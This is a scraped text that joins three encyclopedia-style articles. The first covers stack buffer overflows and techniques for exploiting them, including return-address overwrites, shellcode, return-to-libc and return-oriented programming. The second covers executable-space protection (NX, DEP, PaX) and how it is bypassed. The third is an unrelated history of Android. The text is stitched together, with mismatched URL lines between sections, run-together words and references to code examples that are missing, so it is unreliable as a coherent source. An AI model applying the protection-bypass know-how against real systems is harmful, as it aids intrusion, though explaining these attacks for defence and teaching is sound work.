In software, astack buffer overfloworstack buffer overrunoccurs when a program writes to amemoryaddress on the program'scall stackoutside of the intended data structure, which is usually a fixed-lengthbuffer.[1][2]Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, and in cases where the overflow was triggered by mistake, will often cause the program to crash or operate incorrectly. Stack buffer overflow is a type of the more general programming malfunction known asbuffer overflow(or buffer overrun).[1]Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls. A stack buffer overflow can be caused deliberately as part of an attack known asstack smashing. If the affected program is running with special privileges, or accepts data from untrusted network hosts (e.g. awebserver) then the bug is a potentialsecurity vulnerability. If the stack buffer is filled with data supplied from an untrusted user then that user can corrupt the stack in such a way as to inject executable code into the running program and take control of the process. This is one of the oldest and more reliable methods forattackersto gain unauthorized access to a computer.[3][4][5] The canonical method forexploitinga stack-based buffer overflow is to overwrite the function return address with a pointer to attacker-controlled data (usually on the stack itself).[3][6]This is illustrated withstrcpy()in the following example: This code takes an argument from the command line and copies it to a local stack variablec. This works fine for command-line arguments smaller than 12 characters (as can be seen in figure B below). Any arguments larger than 11 characters long will result in corruption of the stack. (The maximum number of characters that is safe is one less than the size of the buffer here because in the C programming language, strings are terminated by a null byte character. A twelve-character input thus requires thirteen bytes to store, the input followed by the sentinel zero byte. The zero byte then ends up overwriting a memory location that's one byte beyond the end of the buffer.) The program stack infoo()with various inputs: In figure C above, when an argument larger than 11 bytes is supplied on the command linefoo()overwrites local stack data, the saved frame pointer, and most importantly, the return address. Whenfoo()returns, it pops the return address off the stack and jumps to that address (i.e. starts executing instructions from that address). Thus, the attacker has overwritten the return address with a pointer to the stack bufferchar c[12], which now contains attacker-supplied data. In an actual stack buffer overflow exploit the string of "A"'s would instead beshellcodesuitable to the platform and desired function. If this program had special privileges (e.g. theSUIDbit set to run as thesuperuser), then the attacker could use this vulnerability to gain superuser privileges on the affected machine.[3] The attacker can also modify internal variable values to exploit some bugs. With this example: There are typically two methods that are used to alter the stored address in the stack - direct and indirect. Attackers started developing indirect attacks, which have fewer dependencies, in order to bypass protection measures that were made to reduce direct attacks.[7] A number of platforms have subtle differences in their implementation of the call stack that can affect the way a stack buffer overflow exploit will work. Some machine architectures store the top-level return address of the call stack in a register. This means that any overwritten return address will not be used until a later unwinding of the call stack. Another example of a machine-specific detail that can affect the choice of exploitation techniques is the fact that mostRISC-style machine architectures will not allow unaligned access to memory.[8]Combined with a fixed length for machine opcodes, this machine limitation can make the technique of jumping to the stack almost impossible to implement (with the one exception being when the program actually contains the unlikely code to explicitly jump to the stack register).[9][10] Within the topic of stack buffer overflows, an often-discussed-but-rarely-seen architecture is one in which the stack grows in the opposite direction. This change in architecture is frequently suggested as a solution to the stack buffer overflow problem because any overflow of a stack buffer that occurs within the same stack frame cannot overwrite the return pointer. However, any overflow that occurs in a buffer from a previous stack frame will still overwrite a return pointer and allow for malicious exploitation of the bug.[11]For instance, in the example above, the return pointer forfoowill not be overwritten because the overflow actually occurs within the stack frame formemcpy. However, because the buffer that overflows during the call tomemcpyresides in a previous stack frame, the return pointer formemcpywill have a numerically higher memory address than the buffer. This means that instead of the return pointer forfoobeing overwritten, the return pointer formemcpywill be overwritten. At most, this means that growing the stack in the opposite direction will change some details of how stack buffer overflows are exploitable, but it will not reduce significantly the number of exploitable bugs.[citation needed] Over the years, a number ofcontrol-flow integrityschemes have been developed to inhibit malicious stack buffer overflow exploitation. These may usually be classified into three categories: Stack canaries, named for their analogy to acanary in a coal mine, are used to detect a stack buffer overflow before execution of malicious code can occur. This method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer. Most buffer overflows overwrite memory from lower to higher memory addresses, so in order to overwrite the return pointer (and thus take control of the process) the canary value must also be overwritten. This value is checked to make sure it has not changed before a routine uses the return pointer on the stack.[2]This technique can greatly increase the difficulty of exploiting a stack buffer overflow because it forces the attacker to gain control of the instruction pointer by some non-traditional means such as corrupting other important variables on the stack.[2] Another approach to preventing stack buffer overflow exploitation is to enforce a memory policy on the stack memory region that disallows execution from the stack (W^X, "Write XOR Execute"). This means that in order to execute shellcode from the stack an attacker must either find a way to disable the execution protection from memory, or find a way to put their shellcode payload in a non-protected region of memory. This method is becoming more popular now that hardware support for the no-execute flag is available in most desktop processors. While this method prevents the canonical stack smashing exploit, stack overflows can be exploited in other ways. First, it is common to find ways to store shellcode in unprotected memory regions like the heap, and so very little need change in the way of exploitation.[12] Another attack is the so-calledreturn to libcmethod for shellcode creation. In this attack the malicious payload will load the stack not with shellcode, but with a proper call stack so that execution is vectored to a chain of standard library calls, usually with the effect of disabling memory execute protections and allowing shellcode to run as normal.[13]This works because the execution never actually vectors to the stack itself. A variant of return-to-libc isreturn-oriented programming(ROP), which sets up a series of return addresses, each of which executes a small sequence of cherry-picked machine instructions within the existing program code or system libraries, sequence which ends with a return. These so-calledgadgetseach accomplish some simple register manipulation or similar execution before returning, and stringing them together achieves the attacker's ends. It is even possible to use "returnless" return-oriented programming by exploiting instructions or groups of instructions that behave much like a return instruction.[14] Instead of separating the code from the data, another mitigation technique is to introduce randomization to the memory space of the executing program. Since the attacker needs to determine where executable code that can be used resides, either an executable payload is provided (with an executable stack) or one is constructed using code reuse such as in ret2libc or return-oriented programming (ROP). Randomizing the memory layout will, as a concept, prevent the attacker from knowing where any code is. However, implementations typically will not randomize everything; usually the executable itself is loaded at a fixed address and hence even whenASLR(address space layout randomization) is combined with a non-executable stack the attacker can use this fixed region of memory. Therefore, all programs should be compiled withPIE(position-independent executables) such that even this region of memory is randomized. The entropy of the randomization is different from implementation to implementation and a low enough entropy can in itself be a problem in terms of brute forcing the memory space that is randomized. The previous mitigations make the steps of the exploitation harder. But it is still possible to exploit a stack buffer overflow if some vulnerabilities are presents or if some conditions are met.[15] An attacker is able to exploit theformat string vulnerabilityfor revealing the memory locations in the vulnerable program.[16] WhenData Execution Preventionis enabled to forbid any execute access to the stack, the attacker can still use the overwritten return address (the instruction pointer) to point to data in acode segment(.texton Linux) or every other executable section of the program. The goal is to reuse existing code.[17] Consists to overwrite the return pointer a bit before a return instruction (ret in x86) of the program. The instructions between the new return pointer and the return instruction will be executed and the return instruction will return to the payload controlled by the exploiter.[17][clarification needed] Jump Oriented Programming is a technique that uses jump instructions to reuse code instead of the ret instruction.[18] A limitation of ASLR realization on 64-bit systems is that it is vulnerable to memory disclosure and information leakage attacks. The attacker can launch the ROP by revealing a single function address using information leakage attack. The following section describes the similar existing strategy for breaking down the ASLR protection.[19]
https://en.wikipedia.org/wiki/Stack_canary
Incomputer security,executable-space protectionmarksmemoryregions as non-executable, such that an attempt to executemachine codein these regions will cause anexception. It relies on hardware features such as theNX bit(no-execute bit), or on software emulation when hardware support is unavailable. Software emulation often introduces a performance cost, oroverhead(extra processing time or resources), while hardware-based NX bit implementations have no measurable performance impact. Early systems like theBurroughs 5000, introduced in 1961, implemented executable-space protection using atagged architecture(memory tagging to distinguish code from data), a precursor to modern NX bit technology. Today, operating systems use executable-space protection to mark writable memory areas, such as thestackandheap, as non-executable, helping to preventbuffer overflowexploits. These attacks rely on some part of memory, usually the stack, being both writable and executable; if it is not, the attack fails. Many operating systems implement or have an available executable space protection policy. Here is a list of such systems in alphabetical order, each with technologies ordered from newest to oldest. A technology supplying Architecture Independentemulationwill be functional on all processors which aren't hardware supported. The "Other Supported" line is for processors which allow some grey-area method, where an explicit NX bit doesn't exist yet hardware allows one to be emulated in some way. As ofAndroid2.3 and later, architectures which support it have non-executable pages by default, including non-executable stack and heap.[1][2][3] Initial support for theNX bit, onx86-64andIA-32processors that support it, first appeared inFreeBSD-CURRENT on June 8, 2004. It has been in FreeBSD releases since the 5.3 release. TheLinux kernelsupports the NX bit onx86-64andIA-32processors that support it, such as modern 64-bit processors made by AMD, Intel, Transmeta and VIA. The support for this feature in the 64-bit mode on x86-64 CPUs was added in 2004 byAndi Kleen, and later the same year,Ingo Molnáradded support for it in 32-bit mode on 64-bit CPUs. These features have been part of theLinux kernel mainlinesince the release of kernel version 2.6.8 in August 2004.[4] The availability of the NX bit on 32-bit x86 kernels, which may run on both 32-bit x86 CPUs and 64-bit IA-32-compatible CPUs, is significant because a 32-bit x86 kernel would not normally expect the NX bit that anAMD64orIA-64supplies; the NX enabler patch assures that these kernels will attempt to use the NX bit if present. Some desktopLinux distributions, such asFedora,UbuntuandopenSUSE, do not enable the HIGHMEM64 option by default in their default kernels, which is required to gain access to the NX bit in 32-bit mode, because thePAEmode that is required to use the NX bit causes boot failures on pre-Pentium Pro(including Pentium MMX) andCeleron MandPentium Mprocessors without NX support. Other processors that do not support PAE areAMD K6and earlier,Transmeta Crusoe,VIA C3and earlier, andGeodeGX and LX.VMware Workstationversions older than 4.0,Parallels Workstationversions older than 4.0, andMicrosoft Virtual PCandVirtual Serverdo not support PAE on the guest. Fedora Core 6 and Ubuntu 9.10 and later provide a kernel-PAE package which supports PAE and NX. NX memory protection has always been available in Ubuntu for any systems that had the hardware to support it and ran the 64-bit kernel or the 32-bit server kernel. The 32-bit PAE desktop kernel (linux-image-generic-pae) in Ubuntu 9.10 and later, also provides the PAE mode needed for hardware with the NX CPU feature. For systems that lack NX hardware, the 32-bit kernels now provide an approximation of the NX CPU feature via software emulation that can help block many exploits an attacker might run from stack or heap memory. Non-execute functionality has also been present for other non-x86 processors supporting this functionality for many releases. Red Hatkernel developerIngo Molnárreleased a Linux kernel patch namedExec Shieldto approximate and utilize NX functionality on32-bitx86 CPUs. The Exec Shield patch was released to theLinux kernel mailing liston May 2, 2003, but was rejected for merging with the base kernel because it involved some intrusive changes to core code in order to handle the complex parts of the emulation. Exec Shield's legacy CPU support approximates NX emulation by tracking the upper code segment limit. This imposes only a few cycles of overhead during context switches, which is for all intents and purposes immeasurable. For legacy CPUs without an NX bit, Exec Shield fails to protect pages below the code segment limit; an mprotect() call to mark higher memory, such as the stack, executable will mark all memory below that limit executable as well. Thus, in these situations, Exec Shield's schemes fails. This is the cost of Exec Shield's low overhead. Exec Shield checks for twoELFheader markings, which dictate whether the stack or heap needs to be executable. These are called PT_GNU_STACK and PT_GNU_HEAP respectively. Exec Shield allows these controls to be set for both binary executables and for libraries; if an executable loads a library requiring a given restriction relaxed, the executable will inherit that marking and have that restriction relaxed. The PaX NX technology can emulate NX functionality, or use a hardware NX bit. PaX works on x86 CPUs that do not have the NX bit, such as 32-bit x86. The Linuxkernelstill does not ship with PaX (as of May, 2007); the patch must be merged manually. PaX provides two methods of NX bit emulation, called SEGMEXEC and PAGEEXEC. The SEGMEXEC method imposes a measurable but low overhead, typically less than 1%, which is a constant scalar incurred due to the virtual memory mirroring used for the separation between execution and data accesses.[5]SEGMEXEC also has the effect of halving the task's virtual address space, allowing the task to access less memory than it normally could. This is not a problem until the task requires access to more than half the normal address space, which is rare. SEGMEXEC does not cause programs to use more system memory (i.e. RAM), it only restricts how much they can access. On 32-bit CPUs, this becomes 1.5 GB rather than 3 GB. PaX supplies a method similar to Exec Shield's approximation in the PAGEEXEC as a speedup; however, when higher memory is marked executable, this method loses its protections. In these cases, PaX falls back to the older, variable-overhead method used by PAGEEXEC to protect pages below the CS limit, which may become quite a high-overhead operation in certainmemory access patterns. When the PAGEEXEC method is used on a CPU supplying a hardware NX bit, the hardware NX bit is used, thus no significant overhead is incurred. PaX supplies mprotect() restrictions to prevent programs from marking memory in ways that produce memory useful for a potentialexploit. This policy causes certain applications to cease to function, but it can be disabled for affected programs. PaX allows individual control over the following functions of the technology for each binary executable: PaX ignores both PT_GNU_STACK and PT_GNU_HEAP. In the past, PaX had a configuration option to honor these settings but that option has been removed for security reasons, as it was deemed not useful. The same results of PT_GNU_STACK can normally be attained by disabling mprotect() restrictions, as the program will normally mprotect() the stack on load. This may not always be true; for situations where this fails, simply disabling both PAGEEXEC and SEGMEXEC will effectively remove all executable space restrictions, giving the task the same protections on its executable space as a non-PaX system. macOSfor Intel supports the NX bit on all CPUs supported by Apple (from Mac OS X 10.4.4 – the first Intel release – onwards). Mac OS X 10.4 only supported NX stack protection. In Mac OS X 10.5, all 64-bit executables have NX stack and heap; W^X protection. This includesx86-64(Core 2 or later) and 64-bitPowerPCon theG5Macs. As ofNetBSD2.0 and later (December 9, 2004), architectures which support it have non-executable stack and heap.[6] Architectures that have per-page granularity consist of:alpha,amd64,hppa,i386(withPAE),powerpc(ibm4xx),sh5,sparc(sun4m,sun4d), sparc64. Architectures that can only support these with region granularity are: i386 (without PAE), other powerpc (such as macppc). Other architectures do not benefit from non-executable stack or heap; NetBSD does not by default use any software emulation to offer these features on those architectures. A technology in theOpenBSDoperating system, known as W^X, marks writable pages by default as non-executable on processors that support that. On 32-bitx86processors, the code segment is set to include only part of the address space, to provide some level of executable space protection. OpenBSD 3.3 shipped May 1, 2003, and was the first to include W^X. Solarishas supported globally disabling stack execution on SPARC processors since Solaris 2.6 (1997); in Solaris 9 (2002), support for disabling stack execution on a per-executable basis was added. The first implementation of a non-executable stack for Windows (NT 4.0, 2000 and XP) was published by SecureWave via their SecureStack product in 2001, based on the work of PaX.[7][8] Starting withWindows XPService Pack2 (2004) andWindows Server 2003Service Pack 1 (2005), the NX features were implemented for the first time on thex86architecture. Executable space protection on Windows is called "Data Execution Prevention" (DEP). Under Windows XP or Server 2003 NX protection was used on criticalWindows servicesexclusively by default. If thex86processor supported this feature in hardware, then the NX features were turned on automatically in Windows XP/Server 2003 by default. If the feature was not supported by the x86 processor, then no protection was given. Early implementations of DEP provided noaddress space layout randomization(ASLR), which allowed potentialreturn-to-libc attacksthat could have been feasibly used to disable DEP during an attack.[9]ThePaXdocumentation elaborates on why ASLR is necessary;[10]a proof-of-concept was produced detailing a method by which DEP could be circumvented in the absence of ASLR.[11]It may be possible to develop a successful attack if the address of prepared data such as corrupted images orMP3scan be known by the attacker. Microsoft added ASLR functionality inWindows VistaandWindows Server 2008. On this platform, DEP is implemented through the automatic use ofPAEkernelin 32-bit Windows and the native support on 64-bit kernels. Windows Vista DEP works by marking certain parts of memory as being intended to hold only data, which the NX or XD bit enabled processor then understands as non-executable.[12]In Windows, from version Vista, whether DEP is enabled or disabled for a particular process can be viewed on theProcesses/Detailstab in theWindows Task Manager. Windows implements software DEP (without the use of theNX bit) through Microsoft's "SafeStructured Exception Handling" (SafeSEH). For properly compiled applications, SafeSEH checks that, when an exception is raised during program execution, the exception's handler is one defined by the application as it was originally compiled. The effect of this protection is that an attacker is not able to add his own exception handler which he has stored in a data page through unchecked program input.[12][13] When NX is supported, it is enabled by default. Windows allows programs to control which pages disallow execution through itsAPIas well as through the section headers in aPE file. In the API, runtime access to the NX bit is exposed through theWin32API callsVirtualAlloc[Ex]andVirtualProtect[Ex]. Each page may be individually flagged as executable or non-executable. Despite the lack of previous x86 hardware support, both executable and non-executable page settings have been provided since the beginning. On pre-NX CPUs, the presence of the 'executable' attribute has no effect. It was documented as if it did function, and, as a result, most programmers used it properly. In the PE file format, each section can specify its executability. The execution flag has existed since the beginning of the format and standardlinkershave always used this flag correctly, even long before the NX bit. Because of this, Windows is able to enforce the NX bit on old programs. Assuming the programmer complied with "best practices", applications should work correctly now that NX is actually enforced. Only in a few cases have there been problems; Microsoft's own .NET Runtime had problems with the NX bit and was updated. In Microsoft'sXbox, although the CPU does not have the NX bit, newer versions of theXDKset the code segment limit to the beginning of the kernel's.datasection (no code should be after this point in normal circumstances). Starting with version 51xx, this change was also implemented into the kernel of new Xboxes. This broke the techniques old exploits used to become aterminate-and-stay-resident program. However, new exploits were quickly released supporting this new kernel version because the fundamental vulnerability in the Xbox kernel was unaffected. Where code is written and executed at runtime—aJIT compileris a prominent example—the compiler can potentially be used to produce exploit code (e.g. usingJIT Spray) that has been flagged for execution and therefore would not be trapped.[14][15] Return-oriented programmingcan allow an attacker to execute arbitrary code even when executable space protection is enforced.
https://en.wikipedia.org/wiki/Data_execution_prevention
Androidis anoperating systembased on a modified version of theLinux kerneland otheropen-sourcesoftware, designed primarily fortouchscreen-based mobile devices such assmartphonesandtablets. Android has historically been developed by a consortium of developers known as theOpen Handset Alliance, but its most widely used version is primarily developed byGoogle. First released in 2008, Android is the world'smost widely used operating system; the latest version, released on October 15, 2024, isAndroid 15.[4] At its core, the operating system is known as theAndroid Open Source Project(AOSP)[5]and isfree and open-source software(FOSS) primarily licensed under theApache License. However, most devices run theproprietaryAndroid version developed by Google, which ships with additional proprietary closed-source software pre-installed,[6]most notablyGoogle Mobile Services(GMS),[7]which includes core apps such asGoogle Chrome, thedigital distributionplatformGoogle Play, and the associatedGoogle Play Servicesdevelopment platform.Firebase Cloud Messagingis used for push notifications. While AOSP is free, the "Android" name and logo aretrademarksof Google, who restrict the use of Android branding on "uncertified" products.[8][9]The majority of smartphones based on AOSP run Google's ecosystem—which is known simply as Android—some withvendor-customized user interfaces and software suites,[10]for exampleOne UI. Numerousmodified distributionsexist, which include competingAmazon Fire OS, community-developedLineageOS; the source code has also been used to develop a variety of Android distributions on a range of other electronics, such asAndroid TVfor televisions,Wear OSforwearables, andMeta Horizon OSforVR headsets. Software packages on Android, which use theAPKformat, are generally distributed through a proprietaryapplication store; non-Google platforms include vendor-specificAmazon Appstore,Samsung Galaxy Store,Huawei AppGallery, and third-party companiesAptoide,Cafe Bazaar,GetJaror open sourceF-Droid. Since 2011 Android has been the most used operating system worldwide on smartphones. It has the largestinstalled baseof any operating system in the world[11]with over three billionmonthly active users[a]and accounting for 46% of the global operating system market.[b][12] Android Inc.was founded inPalo Alto, California, in October 2003 byAndy Rubinand Chris White, withRich Minerand Nick Sears[13][14]joining later. Rubin and White started out to build an Operating System fordigital camerasvizFotoFrame. The company name was changed toAndroidas Rubin already owned thedomain nameandroid.com. After having built a prototype internally known as the "Fadden demo" predominantly by purchasing licensing agreements for most of the software components built around a customJavaScriptfront-end, the company failed to convince investors, and so in April 2004 they pivoted to building an Operating System for Phones at the suggestion of Nick Sears,[15][16]as a rival toSymbianand MicrosoftWindows Mobile.[17]Rubin pitched the Android project as having "tremendous potential in developing smarter mobile devices that are more aware of its owner's location and preferences".[14]Due to difficulty attracting investors early on, Android faced potential eviction from its office space.Steve Perlman, a close friend of Rubin, brought him $10,000 in cash in an envelope, and shortly thereafter wired an undisclosed amount as seed funding. Perlman refused a stake in the company, and has stated "I did it because I believed in the thing, and I wanted to help Andy."[18][19] In 2005, Rubin tried to negotiate deals withSamsung[20]andHTC.[21]Shortly afterwards,Googleacquired the company in July of that year for at least $50 million;[14][22]this was Google's "best deal ever" according to Google's then-vice president of corporate development,David Lawee, in 2010.[20]Android's key employees, including Rubin, Miner, Sears, and White, joined Google as part of the acquisition.[14]Not much was known about the secretive Android Inc. at the time, with the company having provided few details other than that it was making software for mobile phones.[14]At Google, the team led by Rubin developed a mobile device platform powered by theLinux kernel. Google marketed the platform tohandset makersandcarrierson the promise of providing a flexible, upgradeable system.[23]Google had "lined up a series of hardware components and software partners and signaled to carriers that it was open to various degrees of cooperation".[attribution needed][24] Speculation about Google's intention to enter the mobile communications market continued to build through December 2006.[25]An earlyprototypehad a close resemblance to aBlackBerryphone, with no touchscreen and a physicalQWERTYkeyboard, but the arrival ofApple's2007iPhonemeant that Android "had to go back to the drawing board".[26][27]Google later changed its Android specification documents to state that "Touchscreens will be supported", although "the Product was designed with the presence of discrete physical buttons as an assumption, therefore a touchscreen cannot completely replace physical buttons".[28]By 2008, bothNokiaand BlackBerry announced touch-based smartphones to rival theiPhone 3G, and Android's focus eventually switched to just touchscreens. The first commercially available smartphone running Android was theHTC Dream, also known as T-Mobile G1, announced on September 23, 2008.[29][30] On November 5, 2007, theOpen Handset Alliance, aconsortiumof technology companies including Google, device manufacturers such as HTC,Motorolaand Samsung, wireless carriers such asSprintandT-Mobile, and chipset makers such asQualcommandTexas Instruments, unveiled itself, with a goal to develop "the first truly open and comprehensive platform for mobile devices".[31][32][33]Within a year, the Open Handset Alliance faced two otheropen sourcecompetitors, theSymbian Foundationand theLiMo Foundation, the latter also developing aLinux-based mobile operating system like Google. In September 2007, Google had filed severalpatentapplications in the area of mobile telephony.[34][35][36] On September 23, 2008, Android was introduced by Andy Rubin, Larry Page, Sergey Brin, Cole Brodman, Christopher Schlaeffer and Peter Chou at a press conference in aNew York Citysubway station.[37] Since 2008, Android has seennumerous updateswhich have incrementally improved the operating system, adding new features and fixingbugsin previous releases. The first two Android versions were internally codenamedAstro BoyandBenderbut licensing issues meant subsequent releases were named after dessert or sugary treat in an alphabetical order, with the first few Android versions being called "Petit Four", "Cupcake", "Donut", "Eclair",[38]and "Froyo", in that order. During its announcement ofAndroid KitKatin 2013, Google explained that "Since these devices make our lives so sweet, each Android version is named after a dessert", although a Google spokesperson toldCNNin an interview that "It's kind of like an internal team thing, and we prefer to be a little bit—how should I say—a bit inscrutable in the matter, I'll say".[39] In 2010, Google launched itsNexusseries of devices, a lineup in which Google partnered with different device manufacturers to produce new devices and introduce new Android versions. The series was described as having "played a pivotal role in Android's history by introducing new software iterations and hardware standards across the board", and became known for its "bloat-free" software with "timely ... updates".[40]At itsdeveloper conferencein May 2013, Google announced a special version of theSamsung Galaxy S4, where, instead of using Samsung's own Android customization, the phone ran "stock Android" and was promised to receive new system updates fast.[41]The device would become the start of theGoogle Play editionprogram, and was followed by other devices, including theHTC OneGoogle Play edition,[42]andMoto GGoogle Play edition.[43]In 2015,Ars Technicawrote that "Earlier this week, the last of the Google Play edition Android phones in Google's online storefront were listed as "no longer available for sale" and that "Now they're all gone, and it looks a whole lot like the program has wrapped up".[44][45] From 2008 to 2013,Hugo Barraserved as product spokesperson, representing Android at press conferences andGoogle I/O, Google's annual developer-focused conference. He left Google in August 2013 to join Chinese phone makerXiaomi.[46][47]Less than six months earlier, Google's then-CEOLarry Pageannounced in a blog post that Andy Rubin had moved from the Android division to take on new projects at Google, and thatSundar Pichaiwould become the new Android lead.[48][49]Pichai himself would eventually switch positions, becoming the new CEO of Google in August 2015 following the company's restructure into theAlphabetconglomerate,[50][51]makingHiroshi Lockheimerthe new head of Android.[52][53] OnAndroid 4.4,KitKat, shared writing access toMicroSDmemory cards has been locked for user-installed applications, to which only the dedicated directories with respective package names, located insideAndroid/data/, remained writeable. Writing access has been reinstated withAndroid 5Lollipopthrough thebackwards-incompatibleGoogle Storage Access Frameworkinterface.[54] In June 2014, Google announcedAndroid One, a set of "hardware reference models" that would "allow [device makers] to easily create high-quality phones at low costs", designed for consumers in developing countries.[55][56][57]In September, Google announced the first set of Android One phones for release in India.[58][59]However,Recodereported in June 2015 that the project was "a disappointment", citing "reluctant consumers and manufacturing partners" and "misfires from the search company that has never quite cracked hardware".[60]Plans to relaunch Android One surfaced in August 2015,[61]with Africa announced as the next location for the program a week later.[62][63]A report fromThe Informationin January 2017 stated that Google is expanding its low-cost Android One program into the United States, althoughThe Vergenotes that the company will presumably not produce the actual devices itself.[64][65]Google introduced thePixel and Pixel XL smartphonesin October 2016, marketed as being the first phones made by Google,[66][67]and exclusively featured certain software features, such as theGoogle Assistant, before wider rollout.[68][69]The Pixel phones replaced the Nexus series,[70]with a new generation of Pixel phones launched in October 2017.[71] In May 2019, the operating system became entangled in thetrade war between China and the United StatesinvolvingHuawei, which, like many other tech firms, had become dependent on access to the Android platform.[72][73]In the summer of 2019, Huawei announced it would create an alternative operating system to Android[74]known asHarmony OS,[75]and has filed for intellectual property rights across major global markets.[76][77]Under such sanctions Huawei has long-term plans to replace Android in 2022 with the new operating system, as Harmony OS was originally designed forinternet of thingsdevices, rather than for smartphones and tablets.[78] On August 22, 2019, it was announced that Android "Q" would officially be branded as Android 10, ending the historic practice of naming major versions after desserts. Google stated that these names were not "inclusive" to international users (due either to the aforementioned foods not being internationally known, or being difficult to pronounce in some languages).[79][80]On the same day,Android Policereported that Google had commissioned a statue of a giant number "10" to be installed in the lobby of the developers' new office.[81]Android 10 was released on September 3, 2019, toGoogle Pixelphones first. In late 2021, some users reported that they were unable to dial emergency services.[82][83]The problem was caused by a combination of bugs in Android and in theMicrosoft Teamsapp; both companies released updates addressing the issue.[84] On December 12, 2024GoogleannouncedAndroid XR. It is a new operating system developed by Google, designed forvirtual realityandaugmented realitydevices, such as VR headsets and smart glasses. It was built in collaboration withSamsungandQualcomm. The platform is also focused on supporting developers with tools likeARCoreand Unity to build applications for upcoming XR devices.[85] Android's default user interface is mainly based ondirect manipulation, using touch inputs that loosely correspond to real-world actions, like swiping, tapping, pinching, and reverse pinching to manipulate on-screen objects, along with avirtual keyboard.[86]Game controllersand full-size physical keyboards are supported viaBluetoothorUSB.[87][88]The response to user input is designed to be immediate and provides a fluid touch interface, often using the vibration capabilities of the device to providehaptic feedbackto the user. Internal hardware, such asaccelerometers,gyroscopesandproximity sensorsare used by some applications to respond to additional user actions, for example adjusting the screen from portrait to landscape depending on how the device is oriented,[89]or allowing the user to steer a vehicle in aracing gameby rotating the device, simulating control of asteering wheel.[90] Android devices boot to thehome screen, the primary navigation and information "hub" on Android devices, analogous to thedesktopfound on personal computers. Android home screens are typically made up of app icons andwidgets; app icons launch the associated app, whereas widgets display live, auto-updating content, such as aweather forecast, the user's email inbox, or anews tickerdirectly on the home screen.[91]A home screen may be made up of several pages, between which the user can swipe back and forth.[92]Third-party apps available onGoogle Playand other app stores can extensively re-themethe home screen,[93]and even mimic the look of other operating systems, such asWindows Phone.[94]Most manufacturers customize the look and features of their Android devices to differentiate themselves from their competitors.[95] Along the top of the screen is a status bar, showing information about the device and its connectivity. This status bar can be pulled (swiped) down from to reveal a notification screen where apps display important information or updates, as well as quick access to system controls and toggles such as display brightness, connectivity settings (WiFi, Bluetooth, cellular data), audio mode, andflashlight.[92]Vendors may implement extended settings such as the ability to adjust the flashlight brightness.[96] Notifications are "short, timely, and relevant information about your app when it's not in use", and when tapped, users are directed to a screen inside the app relating to the notification.[97]Beginning withAndroid 4.1 "Jelly Bean", "expandable notifications" allow the user to tap an icon on the notification in order for it to expand and display more information and possible app actions right from the notification.[98] An "All Apps" screen lists all installed applications, with the ability for users to drag an app from the list onto the home screen. The app list may be accessed using a gesture or a button, depending on the Android version. A "Recents" screen, also known as "Overview", lets users switch between recently used apps.[92] The recent list may appear side-by-side or overlapping, depending on the Android version and manufacturer.[99] Many early Android OS smartphones were equipped with a dedicated search button for quick access to aweb search engineand individual apps' internal search feature. More recent devices typically allow the former through a long press or swipe away from the home button.[100] The dedicated option key, also known as menu key, and its on-screen simulation, is no longer supported since Android version 10. Google recommends mobile application developers to locate menus within the user interface.[100]On more recent phones, its place is occupied by a task key used to access the list of recently used apps when actuated. Depending on device, its long press may simulate a menu button press or engagesplit screenview, the latter of which is the default behaviour since stock Android version 7.[101][102][103] Native support for split screen view has been added in stock Android version 7.0Nougat.[103] The earliest vendor-customized Android-based smartphones known to have featured a split-screen view mode are the 2012Samsung Galaxy S3andNote 2, the former of which received this feature with thepremium suiteupgrade delivered inTouchWizwith Android 4.1 Jelly Bean.[104] When connecting or disconnecting charging power and when shortly actuating the power button or home button, all while the device is powered off, a visual battery meter whose appearance varies among vendors appears on the screen, allowing the user to quickly assess the charge status of a powered-off without having to boot it up first. Some display the battery percentage.[105] Most Android devices come with preinstalled Google apps including Gmail, Google Maps, Google Chrome, YouTube, Google Play Movies & TV, and others. Applications ("apps"), which extend the functionality of devices (and must be 64-bit[106]), are written using theAndroid software developmentkit (SDK)[107]and, often,Kotlinprogramming language, which replacedJavaas Google's preferred language for Android app development in May 2019,[108]and was originally announced in May 2017.[109][110]Java is still supported (originally the only option for user-space programs, and is often mixed with Kotlin), as isC++.[111]Java or other JVM languages, such as Kotlin, may be combined withC/C++,[112]together with a choice of non-defaultruntimesthat allow better C++ support.[113] The SDK includes a comprehensive set of development tools,[114]including adebugger,software libraries, a handsetemulatorbased onQEMU, documentation, sample code, and tutorials. Initially, Google's supportedintegrated development environment(IDE) wasEclipseusing the Android Development Tools (ADT) plugin; in December 2014, Google releasedAndroid Studio, based onIntelliJ IDEA, as its primary IDE for Android application development. Other development tools are available, including anative development kit(NDK) for applications or extensions in C or C++,Google App Inventor, a visual environment for novice programmers, and various cross platform mobile web applications frameworks. In January 2014, Google unveiled a framework based onApache Cordovafor portingChromeHTML 5web applicationsto Android, wrapped in a native application shell.[115]Additionally,Firebasewas acquired by Google in 2014 that provides helpful tools for app and web developers.[116] Android has a growing selection of third-party applications, which can be acquired by users by downloading and installing the application'sAPK(Android application package) file, or by downloading them using anapplication storeprogram that allows users toinstall, update, and remove applicationsfrom their devices.Google Play Storeis the primary application store installed on Android devices that comply with Google's compatibility requirements and license the Google Mobile Services software.[117][118]Google Play Store allows users to browse, download and update applications published by Google and third-party developers; as of January 2021[update], there are more than three million applications available for Android in Play Store.[119][120]As of July 2013[update], 50 billion application installations had been performed.[121][122]Some carriers offer direct carrier billing for Google Play application purchases, where the cost of the application is added to the user's monthly bill.[123]As of May 2017[update], there are over one billion active users a month for Gmail, Android, Chrome, Google Play and Maps. Due to the open nature of Android, a number of third-party application marketplaces also exist for Android, either to provide a substitute for devices that are not allowed to ship with Google Play Store, provide applications that cannot be offered on Google Play Store due to policy violations, or for other reasons. Examples of these third-party stores have included theAmazon Appstore,GetJar, and SlideMe.F-Droid, another alternative marketplace, seeks to only provide applications that are distributed underfree and open sourcelicenses.[117][124][125][126] In October 2020, Google removed several Android applications fromPlay Store, as they were identified breaching its data collection rules. The firm was informed by International Digital Accountability Council (IDAC) that apps for children likeNumber Coloring,Princess SalonandCats & Cosplay, with collective downloads of 20 million, were violating Google's policies.[127] At theWindows 11announcement event in June 2021,Microsoftshowcased the newWindows Subsystem for Android(WSA) to enable support for theAndroid Open Source Project(AOSP), but it has since been deprecated. It was meant to allow users runningAndroid appsand games in Windows 11 on their Windows desktop.[128]On March 5, 2024, 